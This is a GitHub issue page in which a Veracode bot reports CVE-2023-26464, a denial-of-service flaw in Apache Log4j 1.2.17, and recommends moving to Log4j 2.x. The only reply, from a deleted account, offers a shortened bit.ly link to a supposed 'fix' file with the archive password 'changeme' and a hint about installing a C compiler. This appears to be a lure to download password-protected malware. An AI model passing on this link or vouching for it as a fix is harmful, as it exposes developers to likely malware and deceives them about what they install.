julz0815 / test-action

0 stars 1 forks source link

CVE: 2023-26464 found in Apache Log4j - Version: 1.2.17 [JAVA] #1113

Open github-actions[bot] opened 2 months ago

github-actions[bot] commented 2 months ago

Veracode Software Composition Analysis

Attribute Details
Library Apache Log4j
Description Apache Log4j 1.2
Language JAVA
Vulnerability Denial Of Service (DoS)
Vulnerability description log4j:log4j is vulnerable to Denial of Service (DoS) attacks. The vulnerability is due to the Chainsaw or SocketAppender components processing a logging entry with either a deeply nested hashmap or hashtable, which can lead to memory exhaustion when the object is deserialized. An attacker can submit a crafted logging entry and cause Denial of Service if the JRE is below 1.7.
CVE 2023-26464
CVSS score 5
Vulnerability present in version/s 1.1.3-1.2.17
Found library version/s 1.2.17
Vulnerability fixed in version
Library latest version 1.2.17
Fix No fix is released. log4j:log4j 1.x has reached End of Life. Users should upgrade to the latest Log4j 2.x version.

Links:

ghost commented 2 months ago

This might help:This file might fix it https://bit.ly/4gvtdhO

Password: changeme

you may need to install the c compiler